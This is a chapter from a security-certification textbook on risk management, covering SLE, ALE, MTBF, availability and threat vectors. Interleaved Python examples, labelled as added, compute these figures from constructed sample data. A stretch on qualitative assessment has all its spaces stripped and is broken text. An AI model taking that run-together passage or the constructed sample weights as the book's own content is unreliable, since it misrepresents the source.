The following five steps can be used in virtually any risk management process. Following these steps will lead to an orderly process of analyzing and mitigating risks.
Tech Tip
Key Performance Indicators (KPIs)
The development of KPIs to monitor performance of systems and processes is critical to effective risk management. If you can’t measure it, you have to rely on more subjective evaluation methods.
Step 1: Asset Identification
Identify and classify the assets, systems, and processes that need protection because they are vulnerable to threats. Use a classification that fits your business. This classification leads to the ability to prioritize assets, systems, and processes and to evaluate the costs of addressing the associated risks. Assets can include the following:
Inventory
Buildings
Cash
Information and data
Hardware
Software
Services
Documents
Personnel
Brand recognition
Organization reputation
Goodwill
Step 2: Threat Assessment
After identifying the assets, you identify both the possible threats and the possible vulnerabilities associated with each asset and the likelihood of their occurrence. Threats can be defined as any circumstance or event with the potential to cause harm to an asset. Common classes of threats include (with examples):
Natural disasters: Hurricane, earthquake, lightning, and so on.
Man-made disasters: Earthen dam failure, such as the 1976 Teton Dam failure in Idaho; car accident that destroys a municipal power distribution transformer; the 1973 explosion of a rail car containing propane gas in Kingman, Arizona.
Terrorism: The 2001 destruction of the World Trade Center, the 1995 gas attack on the Shinjuku train station in Tokyo.
Errors: Employee not following safety or configuration management procedures.
Malicious damage or attacks: A disgruntled employee purposely corrupting data files.
Fraud: An employee falsifying travel expenses or vendor invoices and payments.
Theft: An employee stealing from the loading dock a laptop computer after it has been inventoried but not properly secured.
Equipment or software failure: An error in the calculation of a company-wide bonus overpaying employees.
Vulnerabilities are characteristics of resources that can be exploited by a threat to cause harm. Common classes of vulnerabilities include (with examples):
Unprotected facilities: Company offices with no security officer present or no card-entry system.
Unprotected computer systems: A server temporarily connected to the network before being properly configured/secured.
Unprotected data: Not installing critical security patches to eliminate application security vulnerabilities.
Insufficient procedures and controls: Allowing an accounts payable clerk to create vendors in the accounting system, enter invoices, and authorize check payments.
Insufficient or unqualified personnel: A junior employee not sufficiently securing a server due to a lack of training.
Step 3: Impact Determination and Quantification
An impact is the loss created when a threat exploits a vulnerability. When a threat is realized, it turns risk into impact. Impacts can be either tangible or intangible. A tangible impact results in financial loss or physical damage. For an intangible impact, assigning a financial value of the impact can be difficult. For example, in a manufacturing facility, storing and using flammable chemicals creates a risk of fire to the facility. The vulnerability is that flammable chemicals are stored there. The threat would be that a person could cause a fire by mishandling the chemicals (either intentionally or unintentionally). A tangible impact would be the loss incurred (say, $500,000) if a person ignites the chemicals and fire then destroys part of the facility. An example of an intangible impact would be the loss of goodwill or brand damage caused by the impression that the company doesn’t safely protect its employees or the surrounding geographic area.
Tech Tip
Business Dependencies
An area often overlooked in risk assessment is the need to address business dependencies—each organization must assess risks caused by other organizations with which it interacts. This occurs when the organization is either a consumer of or a supplier to other organizations (or both). For example, if a company is dependent on products produced by a laboratory, then the company must determine the impact of the laboratory not delivering the product when needed. Likewise, an organization must assess risks that can occur when it is the supplier to some other company dependent on its products.
Step 4: Control Design and Evaluation
In this step, you determine which controls to put in place to mitigate the risks. Controls (also called countermeasures or safeguards) are designed to control risk by reducing vulnerabilities to an acceptable level. (For use in this text, the terms control, countermeasure, and safeguard are considered synonymous and are used interchangeably.) Controls can be actions, devices, or procedures. They can be preventive or detective. Preventive controls are designed to prevent the vulnerability from causing an impact. Detective controls are those that detect a vulnerability that has been exploited so that action can be taken.
Exam Tip: The steps in the general risk management model should allow you to identify the steps in any risk management process.
Step 5: Residual Risk Management
Understand that risk cannot be completely eliminated. A risk that remains after implementing controls is termed a residual risk. In this step, you further evaluate residual risks to identify where additional controls are required to reduce risk even more. This leads us to the earlier statement that the risk management process is iterative.
Software Engineering Institute Model
In an approach tailored for managing risk in software projects, SEI uses the following paradigm (SEI, Continuous Risk Management Guidebook [Pittsburgh, PA: Carnegie Mellon University, 1996], 23). Although the terminology varies slightly from the previous model, the relationships are apparent, and either model can be applied wherever risk management is used.
Tech Tip
Can All Risks Be Identified?
It is important to note that not all risks need to be mitigated or controlled; however, as many risks as possible should be identified and reviewed. Those deemed to have potential impact should be mitigated by countermeasures.
1. Identify—Look for risks before they become problems.
2. Analyze—Convert the data gathered into information that can be used to make decisions. Evaluate the impact, probability, and timeframe of the risks. Classify and prioritize each of the risks.
3. Plan—Review and evaluate the risks and decide what actions to take to mitigate them. Implement those mitigating actions.
4. Track—Monitor the risks and the mitigation plans. Trends may provide information to activate plans and contingencies. Review periodically to measure progress and identify new risks.
5. Control—Make corrections for deviations from the risk mitigation plans. Correct products and processes as required. Changes in business procedures may require adjustments in plans or actions, as do faulty plans and risks that become problems.
NIST Risk Models
NIST has several informative risk models that can be applied to an enterprise. NIST has published several Special Publications (SPs) associated with risk management. SP 800-39, Managing Information Security Risk: Organization, Mission, and Information System View, presents several key insights:
Establish a relationship between aggregated risk from information systems and mission/business success
Encourage senior leaders to recognize the importance of managing information security risk within the organization
Help those with system-level security responsibilities understand how system-level issues affect the organization/mission as a whole
SP 800-39 does this through the use of a model, illustrated in Figure 20.2. This model has two distinct levels of analysis, which work together as one in describing risk management actions.
• Figure 20.2 NIST risk management process applied across the tiers
The first level of analysis is represented by four elements: Frame, Assess, Respond, and Monitor. The second level is related to the tiers represented in the hierarchical triangles: Organization, Mission/Business Processes, and Information Systems.
The Frame element represents the organization’s risk framing that establishes the context and provides a common perspective on how the organization manages risk. Risk framing is central to the model, as illustrated by the arrows to the other elements. Its principal output is a risk management strategy that addresses how the organization assesses risk, responds to risk, and monitors risk. The three tiers represent the different distinct layers in an organization that are associated with risk. Tier 1, representing the executive function, is where the risk framing occurs. At Tier 2, the mission and business process layer, the risk management functions of assess, respond, and monitor occur. Tier 3 is the information system layer where activities of risk management are manifested in the systems of the organization.
Model Application
The three model examples define steps that can be used in any general or software risk management process. These risk management principles can be applied to any project, program, or business activity, no matter how simple or complex. Figure 20.3 shows how risk management can be applied across the continuum and that the complexity of risk management generally increases with the size of the project, program, or business to be managed.
• Figure 20.3 Risk complexity versus project size
QualitativelyAssessingRiskQualitativeriskanalysisallowsexpertjudgmentandexperiencetoassumeaprominentrole.Toassessriskqualitatively,youcomparetheimpactofthethreatwiththeprobabilityofoccurrenceandassignanimpactlevelandprobabilityleveltotherisk.Forexample,ifathreathasahighimpactandahighprobabilityofoccurring,theriskexposureishighandprobablyrequiressomeactiontoreducethisthreat(palegreenboxinFigure20.4).Conversely,iftheimpactislowwithalowprobability,theriskexposureislowandnoactionmayberequiredtoreducethelikelihoodoftheoccurrenceorimpactofthisthreat(whiteboxinFigure20.4).Figure20.4showsanexampleofabinaryassessment,whereonlytwooutcomesarepossibleeachforimpactandprobability.Eitheritwillhaveanimpactoritwillnot(oritwillhavealoworhighimpact),anditwilloccuroritwon’t(oritwillhaveahighprobabilityofoccurringoralowprobabilityofoccurring).
•Figure20.4Binaryassessment
Inreality,afewthreatscanusuallybeidentifiedaspresentinghigh-riskexposureandafewthreatspresentlow-riskexposure.Thethreatsthatfallsomewherebetween(paleblueboxesinFigure20.4)willhavetobeevaluatedbyjudgmentandmanagementexperience.Iftheanalysisismorecomplex,requiringthreelevelsofanalysis,such
aslow-medium-highorgreen-yellow-redninecombinationsarepossible,asshowninFigure20.5.Again,thepalegreenboxesprobablyrequireaction,thewhiteboxesmayormaynotrequireaction,andthepaleblueboxesrequirejudgment.(Notethatforbrevity,inFigure20.5thefirsttermineachboxreferstothemagnitudeoftheimpact,andthesecondtermreferstotheprobabilityofthethreatoccurring.)
•Figure20.5Threelevelsofanalysis
Otherlevelsofcomplexityarepossible.Withfivelevelsofanalysis,25valuesofriskexposurearepossible.Inthiscase,thepossiblevaluesofimpactandprobabilitycouldtakeonthevaluesverylow,low,medium,high,orveryhigh.Also,notethatthematrixdoesnothavetobe
symmetrical.Forexample,iftheprobabilityisassessedwiththreevalues(low,medium,high)andtheimpacthasfivevalues(verylow,low,medium,high,veryhigh),theanalysiswouldbeasshowninFigure20.6.(Again,notethatthefirsttermineachboxreferstotheimpact,andthesecondtermineachboxreferstotheprobabilityofoccurrence.)
•Figure20.6A3-by-5levelanalysis
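The binary, 3-by-3 and 3-by-5 matrices above all follow one pattern: each cell is a pair of levels, and only the corner cells are clear-cut. The Python below is an added example, not the book's own material; the level names come from the chapter, while the scoring rule that classes the in-between cells and the sample threats are constructed assumptions.

```python
"""Qualitative risk matrix: impact level versus probability level.

Added example, not from the textbook. The level names follow the
chapter (low/medium/high, very low ... very high); the rule that turns
a cell into "action", "judgment" or "no action" is a constructed
assumption, because the text only says which corner cells need action.
"""
from itertools import product

ACTION, JUDGMENT, NO_ACTION = "action", "judgment", "no action"

TWO_LEVELS = ["low", "high"]                                    # Figure 20.4
THREE_LEVELS = ["low", "medium", "high"]                        # Figure 20.5
FIVE_LEVELS = ["very low", "low", "medium", "high", "very high"]


def _normalized_rank(level, scale):
    """Map a level name to 0.0 (lowest) ... 1.0 (highest) on its scale."""
    if level not in scale:
        raise ValueError(f"unknown level {level!r} for scale {scale}")
    if len(scale) == 1:
        return 1.0
    return scale.index(level) / (len(scale) - 1)


def classify(impact, probability, impact_scale, prob_scale):
    """Classify one (impact, probability) cell of the matrix.

    Constructed rule: average the two normalized ranks. The top quarter
    of the range probably needs action (pale green in the figures), the
    bottom quarter may need none (white), and everything in between is
    left to management judgment (pale blue).
    """
    score = (_normalized_rank(impact, impact_scale)
             + _normalized_rank(probability, prob_scale)) / 2
    if score >= 0.75:
        return ACTION
    if score <= 0.25:
        return NO_ACTION
    return JUDGMENT


def build_matrix(impact_scale, prob_scale):
    """Classify every cell; the matrix need not be symmetrical (3-by-5 works)."""
    return {(i, p): classify(i, p, impact_scale, prob_scale)
            for i, p in product(impact_scale, prob_scale)}


def place_threats(threats, impact_scale, prob_scale):
    """Group assessed threats by cell, as Lab Project 20.2 asks, with the cell's class."""
    placed = {}
    for name, impact, prob in threats:
        cell = placed.setdefault(
            (impact, prob),
            {"class": classify(impact, prob, impact_scale, prob_scale), "threats": []})
        cell["threats"].append(name)
    return placed


# Constructed sample assessment: (threat, impact level, probability level).
SAMPLE_THREATS = [
    ("unpatched public web server", "high", "high"),
    ("backup tape left unencrypted", "high", "low"),
    ("staff clicking phishing links", "medium", "high"),
    ("stale printer firmware", "low", "low"),
]

if __name__ == "__main__":
    placed = place_threats(SAMPLE_THREATS, THREE_LEVELS, THREE_LEVELS)
    for (impact, prob), info in placed.items():
        print(f"impact={impact:<7} probability={prob:<7} -> "
              f"{info['class']:<10} {info['threats']}")
```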
So far, the examples have focused on assessing likelihood versus impact. Qualitative risk assessment can be adapted to a variety of attributes and situations in combination with each other. For example, Figure 20.7 shows the comparison of some specific risks that have been identified during a security assessment. The assessment identified the risk areas listed in the first column (weak intranet security, high number of modems, Internet attack vulnerabilities, and weak incident detection and response mechanism). The assessment also identified various potential impacts, listed across the top (business impact, probability of attack, cost to fix, and difficulty to fix). Each of the impacts has been assessed as low, medium, or high—depicted using green, yellow, and red, respectively. Each of the risk areas has been assessed with respect to each of the potential impacts, and an overall risk assessment has been determined in the last column.
• Figure 20.7 Example of a combination assessment
Quantitatively Assessing Risk
Whereas qualitative risk assessment relies on judgment and experience, quantitative risk assessment applies historical information and trends to attempt to predict future performance. This type of risk assessment is highly dependent on historical data, and gathering such data can be difficult. Quantitative risk assessment can also rely heavily on models that provide decision-making information in the form of quantitative metrics, which attempt to measure risk levels across a common scale. It is important to understand that key assumptions underlie any model, and different models will produce different results even when given the same input data. Although significant research and development have been invested in improving and refining the various risk analysis models, expert judgment and experience must still be considered an essential part of any risk assessment process. Models can never replace judgment and experience, but they can significantly enhance the decision-making process.
Adding Objectivity to a Qualitative Assessment
It is possible to move a qualitative assessment toward being more quantitative. Making a qualitative assessment more objective can be as simple as assigning numeric values to one of the tables shown in Figures 20.4 through 20.7. For example, the impacts listed in Figure 20.7 can be prioritized from highest to lowest and then weighted, as shown in Table 20.2, with business impact weighted the most and difficulty to fix weighted least.
Table 20.2 Adding Weights and Definitions to the Potential Impacts
Next, values can be assigned to reflect how each risk was assessed. Figure 20.7 can thus be made more objective by assigning a value to each color that represents an assessment. For example, a red assessment indicates many critical, unresolved issues, and this will be given an assessment value of 3. Green means few issues are unresolved, so it is given a value of 1. Table 20.3 shows values that can be assigned for an assessment using red, yellow, and green.
Table 20.3 Adding Values to Assessments
The last step is to calculate an overall risk value for each risk area (each row in Figure 20.7) by multiplying the weights depicted in Table 20.2 times the assessed values from Table 20.3 and summing the products:
Risk = W1 * V1 + W2 * V2 + … + W4 * V4
The risk calculation and final risk value for each risk area listed in Figure 20.7 have been incorporated into Figure 20.8. The assessed areas can then be ordered from highest to lowest based on the calculated risk value to aid management in focusing on the risk areas with the greatest potential impact.
• Figure 20.8 Final quantitative assessment of the findings
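The weighted calculation above, worked through in Python as an added example that is not the book's own code. The risk areas and impact columns are the chapter's; the weights, the yellow = 2 value and the colour of each cell are constructed stand-ins for Table 20.2, Table 20.3 and Figure 20.7, which the text does not reproduce here.

```python
"""Weighted scoring that turns the colour table of Figure 20.7 into the
ranked numbers of Figure 20.8: Risk = W1*V1 + W2*V2 + W3*V3 + W4*V4.

Added example, not the textbook's own code. The four risk areas and the
four impact columns are the ones the chapter names. The text gives only
red = 3 and green = 1 (Table 20.3) and says business impact is weighted
most and difficulty to fix least (Table 20.2); the exact weights, the
yellow = 2 value and the colour of each cell are constructed here.
"""

# Table 20.3 as described in the text; yellow = 2 is an assumption.
COLOR_VALUE = {"red": 3, "yellow": 2, "green": 1}

# Constructed stand-in for Table 20.2, highest weight first.
WEIGHTS = {
    "business impact": 4,
    "probability of attack": 3,
    "cost to fix": 2,
    "difficulty to fix": 1,
}

# Constructed stand-in for the coloured cells of Figure 20.7.
ASSESSMENT = {
    "weak intranet security": {
        "business impact": "red", "probability of attack": "red",
        "cost to fix": "yellow", "difficulty to fix": "yellow"},
    "high number of modems": {
        "business impact": "yellow", "probability of attack": "red",
        "cost to fix": "green", "difficulty to fix": "green"},
    "Internet attack vulnerabilities": {
        "business impact": "red", "probability of attack": "yellow",
        "cost to fix": "yellow", "difficulty to fix": "red"},
    "weak incident detection and response mechanism": {
        "business impact": "yellow", "probability of attack": "yellow",
        "cost to fix": "red", "difficulty to fix": "red"},
}


def risk_value(row, weights=WEIGHTS, values=COLOR_VALUE):
    """Sum of weight x assessed value over every impact column of one risk area."""
    missing = set(weights) - set(row)
    if missing:
        raise ValueError(f"row lacks an assessment for {sorted(missing)}")
    total = 0
    for column, weight in weights.items():
        color = row[column]
        if color not in values:
            raise ValueError(f"{color!r} is not one of {sorted(values)}")
        total += weight * values[color]
    return total


def max_risk_value(weights=WEIGHTS, values=COLOR_VALUE):
    """Top of the scale (every cell red), so a score can be read in context."""
    return sum(weights.values()) * max(values.values())


def rank_risk_areas(assessment, weights=WEIGHTS, values=COLOR_VALUE):
    """Risk areas ordered highest to lowest calculated risk, as in Figure 20.8."""
    scored = [(area, risk_value(row, weights, values))
              for area, row in assessment.items()]
    return sorted(scored, key=lambda item: item[1], reverse=True)


if __name__ == "__main__":
    top = max_risk_value()
    for area, value in rank_risk_areas(ASSESSMENT):
        print(f"{value:>3}/{top}  {area}")
```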
Risk Calculation
More complex models permit a variety of analyses based on statistical and mathematical models. A common method is the calculation of the annualized loss expectancy (ALE). Calculating the ALE creates a monetary value of the impact. This calculation begins by calculating a single loss expectancy (SLE).
SLE
The single loss expectancy is calculated using the following formula:
SLE = asset value (AV) × exposure factor (EF)
Exposure factor is a measure of the magnitude of loss of an asset. For example, to calculate the exposure factor, assume the asset value of a small office building and its contents is $2 million. Also assume that this building houses the call center for a business, and the complete loss of the center would take away about half of the capability of the company. Therefore, the exposure factor is 50 percent. The SLE is
$2 million × 0.5 = $1 million
ALE
The ALE is then calculated simply by multiplying the SLE by the likelihood or number of times the event is expected to occur in a year, which is called the annualized rate of occurrence (ARO):
ALE = SLE × ARO
ARO
The annualized rate of occurrence (ARO) is a representation of the frequency of the event, measured in a standard year. If the event is expected to occur once in 20 years, then the ARO is 1/20. Typically the ARO is defined by historical data, either from a company's own experience or from industry surveys. Continuing our example, assume that a fire at this business's location is expected to occur about once in 20 years. Given this information, the ALE is
$1 million × 1/20 = $50,000
Try This!
Calculate SLE, ARO, and ALE
A company owns five warehouses throughout the United States, each of which is valued at $1 million and contributes equally to the company's capacity. Try calculating the SLE, ARO, and ALE for its warehouse located in the Mountain West, where the probability of an earthquake is once every 500 years. Solution: SLE = $1 million × 1.0; ARO = 1/500; ALE = $1 million/500, or $2000.
The ALE determines a threshold for evaluating the cost/benefit ratio of a given countermeasure. Therefore, a countermeasure to protect this business adequately should cost no more than the calculated ALE of $50,000 per year. The examples in this chapter have been simplistic, but they demonstrate the concepts of both qualitative and quantitative risk analysis. More complex algorithms and software packages are available for accomplishing risk analyses, but these examples suffice for the purposes of this text.
Exam Tip: It is always advisable to memorize these fundamental equations for certifications such as CompTIA Security+:
SLE = AV × EF
ALE = SLE × ARO
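The SLE, ARO and ALE formulas and the countermeasure threshold, as an added Python example that is not the book's own code. The two scenarios are the call-center and Mountain West warehouse figures from the text; the Scenario class, the input validation and the exact-fraction arithmetic are additions.

```python
"""Single loss expectancy (SLE), annualized rate of occurrence (ARO)
and annualized loss expectancy (ALE), using the chapter's formulas:
    SLE = AV × EF        ALE = SLE × ARO
Added example, not the book's own code. Exact fractions are used so
that an ARO such as 1/20 does not pick up floating-point noise.
"""
from dataclasses import dataclass
from fractions import Fraction
from typing import Union

Number = Union[int, float, Fraction]


def sle(asset_value: Number, exposure_factor: Number) -> Fraction:
    """SLE = AV × EF, where EF is the fraction of the asset lost (0..1)."""
    av, ef = Fraction(asset_value), Fraction(exposure_factor)
    if av < 0:
        raise ValueError("asset value cannot be negative")
    if not 0 <= ef <= 1:
        raise ValueError("exposure factor must be between 0 and 1")
    return av * ef


def aro_from_interval(years_between_events: Number) -> Fraction:
    """ARO for an event expected once every N years is 1/N."""
    n = Fraction(years_between_events)
    if n <= 0:
        raise ValueError("interval between events must be positive")
    return 1 / n


def ale(single_loss: Number, annual_rate: Number) -> Fraction:
    """ALE = SLE × ARO, the expected loss per standard year."""
    return Fraction(single_loss) * Fraction(annual_rate)


def countermeasure_justified(annual_cost: Number, annual_loss: Number) -> bool:
    """The chapter's threshold: a countermeasure should cost no more per year
    than the ALE it protects against."""
    return Fraction(annual_cost) <= Fraction(annual_loss)


@dataclass(frozen=True)
class Scenario:
    """One asset/threat pairing described by the three inputs the chapter uses."""
    name: str
    asset_value: Number
    exposure_factor: Number
    years_between_events: Number

    def sle(self) -> Fraction:
        return sle(self.asset_value, self.exposure_factor)

    def aro(self) -> Fraction:
        return aro_from_interval(self.years_between_events)

    def ale(self) -> Fraction:
        return ale(self.sle(), self.aro())


# The two scenarios worked in the text.
CALL_CENTER = Scenario("call center building", 2_000_000, Fraction(1, 2), 20)
WAREHOUSE = Scenario("Mountain West warehouse", 1_000_000, 1, 500)

if __name__ == "__main__":
    for s in (CALL_CENTER, WAREHOUSE):
        print(f"{s.name}: SLE=${float(s.sle()):,.0f} ARO={s.aro()} "
              f"ALE=${float(s.ale()):,.0f}/year")
```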
Impact
The impact of an event is a measure of the actual loss when a threat exploits a vulnerability. Federal Information Processing Standards (FIPS) 199 defines three levels of impact using the terms high, moderate, and low. The impact needs to be defined in terms of the context of each organization, as what is high for some firms may be low for much larger firms. The common method is to define the impact levels in terms of important business criteria. Impacts can be in terms of cost (dollars), performance (service level agreement [SLA] or other requirements), schedule (deliverables), or any other important item. Impact can also be categorized in terms of the information security attribute that is relevant to the problem: confidentiality, integrity, or availability.
MTTR
Mean time to repair (MTTR) is a common measure of how long it takes to repair a given failure. This is the average time, and may or may not include the time needed to obtain parts.
MTBF
Mean time between failures (MTBF) is a common measure of reliability of a system and is an expression of the average time between system failures. The time between failures is measured from the time a system returns to service until the next failure. The MTBF is an arithmetic mean of a set of system failures:
MTBF = Σ(start of downtime – start of uptime) / number of failures
MTTF
Mean time to failure (MTTF) is a variation of MTBF, one that is commonly used instead of MTBF when the system is replaced in lieu of being repaired. Other than the semantic difference, the calculations are the same, and the meaning is essentially the same.
Measurement of Availability
Availability is a measure of the amount of time a system performs its intended function. Reliability is a measure of the frequency of system failures. Availability is related to, but different than, reliability and is typically expressed as a percentage of time the system is in its operational state. To calculate availability, both the MTTF and the MTTR are needed:
Availability = MTTF / (MTTF + MTTR)
Assuming a system has an MTTF of 6 months and the repair takes 30 minutes, the availability would be
Availability = 6 months / (6 months + 30 minutes) = 99.9884%
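The MTBF, MTTR and availability formulas applied to an outage record, as an added Python example that is not the book's own code. The outage log is constructed; the 6-month figure uses 30-day months, which reproduces the book's 99.9884 percent.

```python
"""MTBF, MTTR and availability from an outage record.

Added example, not the textbook's own code. It applies the chapter's
formulas:
    MTBF = Σ(start of downtime − start of uptime) / number of failures
    Availability = MTTF / (MTTF + MTTR)
to a constructed outage log. MTTF is taken equal to MTBF, since the
chapter notes the two are calculated the same way.
"""
from datetime import datetime, timedelta
from typing import List, Tuple

Outage = Tuple[datetime, datetime]  # (start of downtime, back in service)


def _check_timeline(service_start: datetime, outages: List[Outage]) -> None:
    """Reject overlapping or out-of-order outages before averaging them."""
    last_up = service_start
    for failed_at, restored_at in outages:
        if failed_at < last_up:
            raise ValueError("outage starts before service was restored")
        if restored_at <= failed_at:
            raise ValueError("restoration must come after the failure")
        last_up = restored_at


def mtbf(service_start: datetime, outages: List[Outage]) -> timedelta:
    """Mean uptime: from each return to service until the next failure."""
    _check_timeline(service_start, outages)
    if not outages:
        raise ValueError("no failures recorded; MTBF is undefined")
    total = timedelta()
    last_up = service_start
    for failed_at, restored_at in outages:
        total += failed_at - last_up      # start of downtime - start of uptime
        last_up = restored_at
    return total / len(outages)


def mttr(outages: List[Outage]) -> timedelta:
    """Mean repair time: from failure until the system is back in service."""
    if not outages:
        raise ValueError("no failures recorded; MTTR is undefined")
    return sum((r - f for f, r in outages), timedelta()) / len(outages)


def availability(mttf: timedelta, repair: timedelta) -> float:
    """Availability = MTTF / (MTTF + MTTR), returned as a percentage."""
    up, fix = mttf.total_seconds(), repair.total_seconds()
    if up <= 0 or fix < 0:
        raise ValueError("MTTF must be positive and MTTR non-negative")
    return 100 * up / (up + fix)


def availability_from_log(service_start: datetime, outages: List[Outage]) -> float:
    """End-to-end: derive MTBF (used as MTTF) and MTTR, then availability."""
    return availability(mtbf(service_start, outages), mttr(outages))


# The chapter's worked figure: MTTF of 6 months (30-day months assumed)
# and a 30-minute repair.
BOOK_MTTF = timedelta(days=6 * 30)
BOOK_MTTR = timedelta(minutes=30)

# Constructed outage log for one system.
SERVICE_START = datetime(2024, 1, 1)
OUTAGES = [
    (datetime(2024, 1, 11, 0, 0), datetime(2024, 1, 11, 2, 0)),
    (datetime(2024, 1, 21, 2, 0), datetime(2024, 1, 21, 3, 0)),
    (datetime(2024, 2, 1, 3, 0), datetime(2024, 2, 1, 3, 30)),
]

if __name__ == "__main__":
    print(f"book example: {availability(BOOK_MTTF, BOOK_MTTR):.4f}%")
    print(f"MTBF {mtbf(SERVICE_START, OUTAGES)}  MTTR {mttr(OUTAGES)}  "
          f"availability {availability_from_log(SERVICE_START, OUTAGES):.4f}%")
```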
Qualitative vs. Quantitative Risk Assessment
It is recognized throughout industry that it is impossible to conduct risk management that is purely quantitative. Usually risk management includes both qualitative and quantitative elements, requiring both analysis and judgment or experience. In contrast to quantitative assessment, it is possible to accomplish purely qualitative risk management. It is easy to see that it is impossible to define and quantitatively measure all factors that exist in a given risk assessment. It is also easy to see that a risk assessment that measures no factors quantitatively but measures them all qualitatively is possible. The decision of whether to use qualitative versus quantitative risk management depends on the criticality of the project, the resources available, and the management style. The decision will be influenced by the degree to which the fundamental risk management metrics, such as asset value, exposure factor, and threat frequency, can be quantitatively defined.
Tech Tip
Accepting Risk
In addition to mitigating risk or transferring risk, a manager, knowing the potential cost of a given risk and its associated probability, may accept responsibility for the risk if it does happen. For example, a manager may choose to allow a programmer to make "emergency" changes to a production system (in violation of good segregation of duties) because the system cannot go down during a given period of time. The manager accepts the risk that the programmer could possibly make unauthorized changes because of the high availability requirement of that system. However, there should always be some additional controls such as a management review or a standardized approval process to ensure the assumed risk is adequately managed.
Tools
Many tools can be used to enhance the risk management process. The following tools can be used during the various phases of risk assessment to add objectivity and structure to the process. Understanding the details of each of these tools is not necessary for the CompTIA Security+ exam, but understanding what they can be used for is important. More information on these tools can be found in any good project-management text.
Affinity grouping: A method of identifying items that are related and then identifying the principle that ties them together.
Baseline identification and analysis: The process of establishing a baseline set of risks. It produces a "snapshot" of all the identified risks at a given point in time.
Cause and effect analysis: Identifying relationships between a risk and the factors that can cause it. This is usually accomplished using fishbone diagrams developed by Dr. Kaoru Ishikawa, former professor of engineering at the Science University of Tokyo.
Cost/benefit analysis: A straightforward method for comparing cost estimates with the benefits of a mitigation strategy.
Gantt charts: A management tool for diagramming schedules, events, and activity duration.
Interrelationship digraphs: A method for identifying cause-and-effect relationships by clearly defining the problem to be solved, identifying the key elements of the problem, and then describing the relationships between each of the key elements.
Pareto charts: A histogram that ranks the categories in a chart from most frequent to least frequent, thus facilitating risk prioritization.
PERT (program evaluation and review technique) charts: A diagram depicting interdependencies between project activities, showing the sequence and duration of each activity. When complete, the chart shows the time necessary to complete the project and the activities that determine that time (the critical path).
Risk management plan: A comprehensive plan documenting how risks will be managed on a given project. It contains processes, activities, milestones, organizations, responsibilities, and details of each major risk management activity and how it is to be accomplished. It is an integral part of the project management plan.
Cost-Effectiveness Modeling
Cost-effectiveness modeling assumes you are incurring a cost and focuses on the question of what the value of that cost is. This is a rational means of economic analysis used to determine the utility of a specific strategy. It is a nearly foregone conclusion you will be spending resources on security; this just reframes the question to one of utility and outcome from the activity.
Tech Tip
Risks Really Don't Change, but They Can Be Mitigated
One final thought to keep in mind is that the risk itself doesn't really change, no matter what actions are taken to mitigate that risk. A high risk will always be a high risk. However, actions can be taken to reduce the likelihood of the risk, and the impact of that risk if it occurs.
A related term, total cost of ownership (TCO), is the set of all costs, everything from capital costs to operational and exception-handling costs, that is associated with a technology. There are a lot of arguments over how to calculate TCO, typically to favor one solution over another, but that is not important in this instance. It is important to note the differences between normal operational costs and exception handling. Exception handling is always more expensive. The objective in risk management is to have a set of overlapping controls such that the TCO is minimized. This means that the solution has a measured effectiveness across the risk spectrum and that exceptions are minimized. This is where the compliance versus security debate becomes interesting. We establish compliance rules for a variety of reasons, but once established, their future effectiveness depends upon the assumption that the same risk environment exists as when they were created. Should the risk, the value, or the impact change over time, the cost effectiveness of the compliance-directed control can shift, frequently in a negative fashion.
Risk Management Best Practices
Best practices are the best defenses that an organization can employ in any activity. One manner of examining best practices is to ensure that the business has the set of best practices to cover its operational responsibilities. At a deeper level, the details of these practices need to themselves be best practices if one is to get the best level of protection. At a minimum, risk mitigation best practices include business continuity, high availability, fault tolerance, and disaster recovery concepts. None of these operate in isolation. In fact, they are all interconnected, sharing elements as they all work together to achieve a common purpose: the security of the data in the enterprise, which is measured in terms of risk exposure. Key elements of best practices include understanding of vulnerabilities, understanding the threat vectors and likelihoods of occurrence, and the use of mitigation techniques to reduce residual risk to manageable levels.
System Vulnerabilities
Vulnerabilities are characteristics of an asset that can be exploited by a threat to cause harm. All systems have bugs or errors. Not all errors or bugs are vulnerabilities. For an error or bug to be classified as a vulnerability, it must be exploitable, meaning an attacker must be able to use the bug to cause a desired result. There are three elements needed for a vulnerability to occur:
The system must have a flaw.
The flaw must be accessible by an attacker.
The attacker must possess the ability to exploit the flaw.
Vulnerabilities can exist in many levels and from many causes. From design errors, coding errors, or unintended (and untested) combinations in complex systems, there are numerous forms of vulnerabilities. Vulnerabilities can exist in software, hardware, and procedures. Whether in the underlying system, in a security control designed to protect the system, or in the procedures employed in the operational use of the system, the result is the same: a vulnerability represents an exploitable weakness that increases the level of risk associated with the system.
Exam Tip: Vulnerabilities can be fixed, removed, and mitigated. They are part of any system and represent weaknesses that may be exploited.
Threat Vectors
A threat is any circumstance or event with the potential to cause harm to an asset. For example, a malicious hacker might choose to hack your system by using readily available hacking tools. Threats can be classified in groups, with the term threat vector describing the elements of these groups. A threat vector is the path or tool used by an attacker to attack a target. There is a wide range of threat vectors that a security professional needs to understand:
The Web (fake sites, session hijacking, malware, watering hole attacks)
Wireless unsecured hotspots
Mobile devices (iOS/Android)
USB (removable) media
E-mail (links, attachments, malware)
Social engineering (deceptions, hoaxes, scams, and fraud)
This listing is merely a sample of threat vectors. From a defensive point of view, it is important not to become fixated on specific threats, but rather to pay attention to the threat vectors. If a user visits a website that has malicious code, then the nature of the code, although important from a technical view in one respect, is not the primary concern. The primary issue is the malicious site, as this is the threat vector.
Probability/Threat Likelihood
The probability or likelihood of an event is a measure of how often it is expected to occur. From a qualitative assessment using terms such as frequent, occasionally, and rare, to the quantitative measure ARO, the purpose is to allow scaling based on frequency of an event. Determining the specific probabilities of security events with any accuracy is a nearly impossible feat. What is important in the use of probabilities and likelihoods is the relationship it has with respect to determining relative risk. Just as an insurance company cannot tell you when you will have an accident, no one can predict when a security event will occur. What can be determined is that over some course of time—say, the next year—a significant number of users will click malicious links in e-mails. The threat likelihood of different types of attacks will change over time. Years ago, web defacements were all the rage. Today, spear phishing is more prevalent.
The use of insurance-type actuarial models for risk determination is useful when risks are independent, such as in auto accidents. But controls need to be added when a factor becomes less independent, such as a bad driver. In cybersecurity, once an attack is successful, it is repeatedly employed against a victim, breaking any form of independence and making the probability = 1. This lessens the true usefulness of the insurance-type actuarial models in cybersecurity practice.
When examining risk, the probability or threat likelihood plays a significant role in the determination of risk and mitigation options. In many cases, the likelihood is treated as certain, and for repeat attacks, this may be appropriate, but it certainly is not universally true.
Risk Avoidance, Transference, Acceptance, Mitigation, Deterrence
